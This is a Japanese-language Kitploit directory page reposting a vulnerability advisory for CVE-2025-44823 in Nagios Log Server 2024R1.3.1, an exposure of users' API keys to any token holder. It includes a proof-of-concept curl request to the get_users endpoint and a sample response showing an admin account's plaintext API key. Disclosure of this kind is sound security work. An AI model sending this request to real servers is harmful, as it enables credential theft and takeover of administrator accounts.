Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-44823 — Nagios Log Server 2024R1.3.1 における認証済みAPIキーの露出 | Kitploit
ツール/GitHubGitHub/skraft9/cve-2025-44823
特権昇格脆弱性分析エクスプロイト情報収集認証APIセキュリティ
GitHubskraft9/cve-2025-44823

CVE-2025-44823

Nagios Log Server 2024R1.3.1 における認証済みAPIキーの露出

リポジトリを見る
9ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Nagios Log Server 2024R1.3.1 における認証済みAPIキーの露出

▶️ PoCデモ

CVE ID: CVE-2025-44823

日付: 2025-04-02

著者: Alex Tisdale, Seth Kraft

ベンダーホームページ: https://www.nagios.com/

ベンダーチェンジログ: https://www.nagios.com/changelog/#log-server

ソフトウェアリンク: https://assets.nagios.com/downloads/nagios-log-server/versions.php

バージョン: 2024R1.3.1 以下

テスト環境: Nagios Log Server 2024R1.3.1 (デフォルト設定、Ubuntu 20.04)

CWE: CWE-497

CVSS: 9.8 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

認可

研究および許可されたテストのみを目的としています。 許可なくシステムに対して使用しないでください。

説明

Nagios Log Server 2024R1.3.1 におけるAPIレベルの脆弱性により、有効なAPIトークンを持つ任意のユーザーが、管理者資格情報を含むユーザーアカウントの完全なリストとその平文のAPIキーを取得できます。この欠陥により、ユーザー列挙、権限昇格、および露出したトークンの不正使用によるシステム全体の侵害が可能になります。

PoC

ステップ1: 脆弱なエンドポイントにアクセス

root@kitploit:~
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"

サンプル応答

root@kitploit:~
[
  {
    "name": "devadmin",
    "username": "devadmin",
    "email": "[email protected]",
    "apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
    "auth_type": "admin",
    ...
  }
]
ツールをダウンロード